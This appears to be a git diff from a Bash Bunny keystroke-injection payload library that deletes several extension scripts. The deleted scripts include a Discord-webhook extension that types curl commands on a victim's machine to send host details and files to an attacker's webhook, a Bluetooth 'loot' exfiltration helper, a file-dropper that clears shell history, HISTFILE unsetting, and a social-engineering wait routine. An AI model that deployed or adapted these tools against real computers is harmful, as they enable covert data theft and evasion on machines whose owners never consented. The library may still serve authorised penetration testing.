|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,34",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "40,00,14",
|
||||
"3": "00,00,20",
|
||||
"#": "40,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "40,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,20",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,23",
|
||||
"8": "00,00,25",
|
||||
"*": "00,00,2d",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,25",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,26",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2e",
|
||||
"_": "02,00,2e",
|
||||
"=": "02,00,27",
|
||||
"+": "02,00,21",
|
||||
"[": "40,00,25",
|
||||
"{": "40,00,24",
|
||||
"]": "40,00,26",
|
||||
"}": "40,00,27",
|
||||
"\\": "40,00,2d",
|
||||
"|": "40,00,2e",
|
||||
";": "02,00,31",
|
||||
":": "02,00,38",
|
||||
"'": "02,00,1f",
|
||||
"\"": "00,00,35",
|
||||
"`": "40,00,31",
|
||||
"~": "40,00,30",
|
||||
",": "00,00,31",
|
||||
"<": "40,00,35",
|
||||
".": "00,00,38",
|
||||
">": "40,00,1e",
|
||||
"/": "02,00,24",
|
||||
"?": "02,00,2d",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
@@ -1,16 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# BLE_EXFIL v1 by @drapl0n
|
||||
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
|
||||
# Usage: BLE_EXFIL
|
||||
|
||||
function BLE_EXFIL() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
text=$(cat /root/udisk/loot/ble_exfil.txt)
|
||||
exfil=${text:0:25}
|
||||
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
|
||||
}
|
||||
|
||||
export -f BLE_EXFIL
|
||||
@@ -1,86 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Discord Extension
|
||||
# Description: Interact with discord webhook to exfiltrate text or files
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 1.0
|
||||
# Category: Extension
|
||||
#
|
||||
# To use this extension, you need to create a webhook on discord and get the webhook id and token
|
||||
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
|
||||
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
|
||||
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
|
||||
|
||||
function DISCORD() {
|
||||
|
||||
case $1 in
|
||||
|
||||
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
|
||||
# @usage DISCORD INIT
|
||||
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
|
||||
"INIT")
|
||||
|
||||
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
|
||||
curl_header="Content-Type: application/json"
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location '$curl_location'"
|
||||
Q STRING " --header '$curl_header'"
|
||||
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_OS}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V4}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V6}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_USER}'"
|
||||
Q STRING "\",\"inline\":true}]"
|
||||
Q STRING "}]}'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
"SEND")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Send a message to discord via webhook
|
||||
# @usage DISCORD SEND MSG $yourMessage
|
||||
"MSG")
|
||||
|
||||
if [[ "$3" == *"$"* ]]; then
|
||||
message="'$3'"
|
||||
else
|
||||
message=$3
|
||||
fi
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Send a file to discord via webhook
|
||||
# @usage DISCORD SEND FILE $yourFilePath
|
||||
"FILE")
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DISCORD
|
||||
@@ -1,103 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# DROP v1 by bg-wa
|
||||
# Simplifies dropping files from HID attacks for LINUX
|
||||
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||
#
|
||||
# Example:
|
||||
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||
source ./run.sh
|
||||
|
||||
function DROP() {
|
||||
os=$1
|
||||
source=$2
|
||||
destination=$3
|
||||
overwrite=$4
|
||||
executable=$5
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
RUN WIN powershell
|
||||
;;
|
||||
OSX)
|
||||
RUN OSX terminal
|
||||
;;
|
||||
UNITY)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
LINUX)
|
||||
RUN LINUX terminal
|
||||
;;
|
||||
*)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
esac
|
||||
|
||||
QUACK DELAY 1000
|
||||
|
||||
if "$overwrite" == "true"
|
||||
then
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING del "$destination"
|
||||
;;
|
||||
*)
|
||||
QUACK STRING rm "$destination"
|
||||
;;
|
||||
esac
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING fsutil file createnew "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING notepad.exe "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
;;
|
||||
*)
|
||||
QUACK STRING vi "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING i
|
||||
;;
|
||||
esac
|
||||
|
||||
while IFS= read -r data
|
||||
do
|
||||
QUACK STRING "$data"
|
||||
QUACK ENTER
|
||||
done < "$source"
|
||||
|
||||
QUACK DELAY 500
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK CTRL s
|
||||
QUACK CRTL x
|
||||
;;
|
||||
*)
|
||||
QUACK ESC
|
||||
QUACK ENTER
|
||||
QUACK STRING :wq
|
||||
QUACK ENTER
|
||||
|
||||
if "$executable" == "true"
|
||||
then
|
||||
QUACK STRING chmod +x "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
QUACK STRING history -c
|
||||
QUACK ENTER
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DROP
|
||||
@@ -26,10 +26,6 @@ function GET() {
|
||||
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
|
||||
export TARGET_OS='UNKNOWN'
|
||||
;;
|
||||
"BB_LABEL")
|
||||
export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# LINUX_MOUNT v1 by @drapl0n
|
||||
# Auto mounts BashBunny on GNU/Linux systems.
|
||||
# NOTE: Mount path is stored in variable "lmnt".
|
||||
# Usage: LINUX_MOUNT - to automatically mount BashBunny.
|
||||
# LINUX_UMOUNT - to unmount mounted BashBunny.
|
||||
|
||||
function LINUX_MOUNT() {
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
}
|
||||
function LINUX_UMOUNT() {
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
}
|
||||
export -f LINUX_MOUNT LINUX_UMOUNT
|
||||
@@ -1,278 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: OSX Extension
|
||||
# Description: Allow a bunch of osx interaction
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 2.0
|
||||
# Category: Extension
|
||||
|
||||
function OSX() {
|
||||
|
||||
case $1 in
|
||||
|
||||
"TERMINAL")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Open a terminal
|
||||
# @usage OSX TERMINAL OPEN
|
||||
"OPEN")
|
||||
Q GUI SPACE
|
||||
Q STRING terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Initialize the terminal
|
||||
# Make the PS1 nicer (just because I like it)
|
||||
# Grab Host information and store it in BB_OSX vars
|
||||
# @usage OSX TERMINAL INIT
|
||||
# @info This command need a focused terminal
|
||||
"INIT")
|
||||
|
||||
Q STRING "bash"
|
||||
Q ENTER
|
||||
Q STRING "clear"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
|
||||
Q ENTER
|
||||
Q STRING 'BB_HOST_USER=$(whoami)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_NAME=$(hostname)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "BB_HOST_OS='OSX'"
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
# @desc Minimize the terminal
|
||||
# @usage OSX TERMINAL MINIMIZE
|
||||
# @info This command need a focused terminal
|
||||
"MINIMIZE")
|
||||
Q STRING 'printf \e[2t'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Resize the focused terminal
|
||||
# @usage OSX TERMINAL RESIZE $width $height
|
||||
# @param <integer> $width The terminal width
|
||||
# @param <integer> $height The terminal height
|
||||
# @info This command need a focused terminal
|
||||
"RESIZE")
|
||||
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Clear the focused terminal
|
||||
# @usage OSX TERMINAL ZOOM
|
||||
# @info This command need a focused terminal
|
||||
"CLEAR")
|
||||
Q STRING clear
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Close all terminal
|
||||
# @usage OSX TERMINAL CLOSE
|
||||
# @info This command need a focused terminal
|
||||
"CLOSE")
|
||||
Q STRING history -c
|
||||
Q ENTER
|
||||
Q STRING killall Terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Change terminal window name
|
||||
# @usage OSX TERMINAL NAME <WINDOW_NAME>
|
||||
# @info This command need a focused terminal
|
||||
"NAME")
|
||||
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"NETWORK")
|
||||
|
||||
case $2 in
|
||||
|
||||
"WIFI")
|
||||
|
||||
case $3 in
|
||||
|
||||
# @desc Enable wifi
|
||||
# @usage OSX NETWORK WIFI ENABLE
|
||||
"ENABLE")
|
||||
Q STRING "networksetup -setairportpower en0 on"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Disable wifi
|
||||
# @usage OSX NETWORK WIFI DISABLE
|
||||
"DISABLE")
|
||||
Q STRING "networksetup -setairportpower en0 off"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Connect to a wifi network
|
||||
# @usage OSX NETWORK CONNECT $ssid $password
|
||||
# @arg <string> Wifi SSID
|
||||
# @arg <string> Wifi Password
|
||||
"CONNECT")
|
||||
Q STRING "networksetup -setairportnetwork en0 $4 $5"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"ETHERNET")
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"SESSION")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Shutdown the computer
|
||||
# @usage OSX SESSION SHUTDOWN
|
||||
"SHUTDOWN")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Restart the computer
|
||||
# @usage OSX SESSION RESTART
|
||||
"RESTART")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Lock the computer
|
||||
# @usage OSX SESSION LOCK
|
||||
"LOCK")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Logout current session
|
||||
# @usage OSX SESSION LOGOUT
|
||||
"LOGOUT")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"GET_USER")
|
||||
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
|
||||
Q STRING 'BB_OSX_USER=$(whoami)'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"SOUND")
|
||||
|
||||
case $2 in
|
||||
|
||||
"PLAY")
|
||||
Q STRING "afplay $3"
|
||||
;;
|
||||
|
||||
# @desc Change the computer volume
|
||||
# @usage OSX MISC VOLUME $volumeValue
|
||||
# @arg <integer> An integer between 0 and 10
|
||||
"VOLUME")
|
||||
Q STRING "osascript -e 'set Volume $3'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"NOTIFICATION")
|
||||
|
||||
case $2 in
|
||||
|
||||
"CLEAR")
|
||||
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"DISPLAY")
|
||||
|
||||
if [ -z $6]; then
|
||||
$6=${1:-"Purr"}
|
||||
fi
|
||||
|
||||
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
|
||||
;;
|
||||
|
||||
"MISC")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Show or hide desktop icon
|
||||
# @usage OSX MISC DESKTOP_ICON $action
|
||||
# @arg <string> HIDE | void
|
||||
"DESKTOP_ICON")
|
||||
if [ $3 == "HIDE" ]; then
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
|
||||
Q ENTER
|
||||
else
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
|
||||
Q ENTER
|
||||
fi
|
||||
;;
|
||||
|
||||
# @desc Change wallpaper with the specified url image
|
||||
# @usage OSX MISC WALLPAPER_URL
|
||||
"WALLPAPER_URL")
|
||||
Q STRING "cd ~/Desktop"
|
||||
Q ENTER
|
||||
Q STRING "curl $3 > img.bb"
|
||||
Q ENTER
|
||||
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Say something in the way of bigben
|
||||
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
|
||||
# @info Need a focused terminal
|
||||
"SAY")
|
||||
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
}
|
||||
|
||||
export -f OSX
|
||||
@@ -1,126 +0,0 @@
|
||||
#!/bin/bash
|
||||
|
||||
################################################################################
|
||||
# Quickly get to a prompt on any platform with the BashBunny
|
||||
#
|
||||
# How this works?
|
||||
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||
# with:
|
||||
# PROMPT [OS]
|
||||
# 2) OS options are:
|
||||
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||
# "UNITY" : Launches Terminal in Unity
|
||||
# "UNITY_RUN" : Opens run prompt in Unity
|
||||
# "MAC" : Launches Terminal in OSX
|
||||
# "POWERSHELL" : Launches Powershell in Windows
|
||||
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||
# 3) To close a prompt use:
|
||||
# CLOSE_PROMPT [OS]
|
||||
################################################################################
|
||||
|
||||
################################################################################
|
||||
# Start HID Prompt
|
||||
################################################################################
|
||||
|
||||
|
||||
function PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
OS="AUTO"
|
||||
else
|
||||
OS=$1
|
||||
fi
|
||||
|
||||
#AUTO
|
||||
if [ "${OS}" = "AUTO" ]; then
|
||||
LED G B 100
|
||||
QUACK ALT F2
|
||||
QUACK DELAY 50
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 50
|
||||
QUACK GUI r
|
||||
clear_active_input
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY
|
||||
if [ "${OS}" = "UNITY" ]; then
|
||||
LED R B 100
|
||||
QUACK GUI
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY_RUN
|
||||
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||
LED R B 100
|
||||
QUACK ALT F2
|
||||
fi
|
||||
|
||||
#MAC
|
||||
if [ "${OS}" = "MAC" ]; then
|
||||
LED R B G 100
|
||||
QUACK GUI SPACE
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#POWERSHELL
|
||||
if [ "${OS}" = "POWERSHELL" ]; then
|
||||
LED B 100
|
||||
QUACK GUI
|
||||
QUACK DELAY 500
|
||||
QUACK powershell
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#WINDOWS_RUN
|
||||
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||
LED B 100
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
LED 0
|
||||
|
||||
}
|
||||
|
||||
function CLOSE_PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
QUACK ALT F4
|
||||
else
|
||||
if [ "$1" = "MAC" ]; then
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK ALT F4
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
# HELPER FUNCTIONS
|
||||
function wait_enter_wait() {
|
||||
if [ -z "$1" ]; then
|
||||
BEFORE_WAIT=100
|
||||
else
|
||||
BEFORE_WAIT=$1
|
||||
fi
|
||||
if [ -z "$2" ]; then
|
||||
AFTER_WAIT=100
|
||||
else
|
||||
AFTER_WAIT=$2
|
||||
fi
|
||||
|
||||
QUACK DELAY ${BEFORE_WAIT}
|
||||
QUACK ENTER
|
||||
QUACK DELAY ${AFTER_WAIT}
|
||||
}
|
||||
|
||||
function clear_active_input() {
|
||||
QUACK DELAY 50
|
||||
QUACK BACKSPACE
|
||||
QUACK DELAY 100
|
||||
}
|
||||
|
||||
export -f PROMPT
|
||||
export -f CLOSE_PROMPT
|
||||
@@ -23,12 +23,6 @@ function RUN() {
|
||||
QUACK STRING "$@"
|
||||
QUACK ENTER
|
||||
;;
|
||||
WIN_ADMIN)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "$@"
|
||||
QUACK CTRL-SHIFT ENTER
|
||||
;;
|
||||
OSX)
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 500
|
||||
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Social engineering wait by GermanNoob
|
||||
#
|
||||
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
|
||||
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
|
||||
#
|
||||
# This is just a small extension to DarrenKitchen's WAIT
|
||||
|
||||
function SEWAIT() {
|
||||
LED SPECIAL
|
||||
ATTACKMODE STORAGE
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
LED SPECIAL2
|
||||
while true
|
||||
do GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f SEWAIT
|
||||
@@ -1,8 +1,9 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT v1 by @Hak5Darren
|
||||
# Pauses payload until the switch position has changed
|
||||
# Waits blocks the payload from continuing until the switch position has changed
|
||||
# Usage: WAIT
|
||||
|
||||
function WAIT() {
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
@@ -12,43 +13,5 @@ function WAIT() {
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT
|
||||
|
||||
|
||||
# WAIT_FOR_LOOT v1 by Korben
|
||||
# WAIT_FOR_LOOT <file_path> (optional)<refresh interval in seconds>
|
||||
#
|
||||
# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
|
||||
# Will return once /root/loot/captured_keys.txt exists
|
||||
# OR IF FILE ALREADY EXISTS
|
||||
# Will return once the file line count has increased
|
||||
|
||||
function WAIT_FOR_LOOT() {
|
||||
# Check for refresh interval override
|
||||
if [ -z "${2}" ]; then
|
||||
REFRESH_INTERVAL=1
|
||||
else
|
||||
REFRESH_INTERVAL=$2
|
||||
fi
|
||||
|
||||
if [ -f "${1}" ]; then
|
||||
# If file already exists wait for it to change size
|
||||
start_count=$(cat $1|wc -l)
|
||||
while [ $(cat $1|wc -l) -eq $start_count ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
else
|
||||
# File doesn't exist, wait for it to be created
|
||||
while [ ! -f "${1}" ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
fi
|
||||
}
|
||||
export -f WAIT_FOR_LOOT
|
||||
|
||||
# WAIT_FOR_TARGET_IP v1 by Hak5Darren
|
||||
# Pauses payload until target receives IP address
|
||||
function WAIT_FOR_TARGET_IP() {
|
||||
until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
|
||||
}
|
||||
export -f WAIT_FOR_TARGET_IP
|
||||
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS NOT present
|
||||
# Usage: WAIT_FOR_NOTPRESENT devicename
|
||||
|
||||
function WAIT_FOR_NOTPRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
echo "$1 found"
|
||||
else
|
||||
break
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_NOTPRESENT
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_PRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS present
|
||||
# Usage: WAIT_FOR_PRESENT devicename
|
||||
|
||||
function WAIT_FOR_PRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
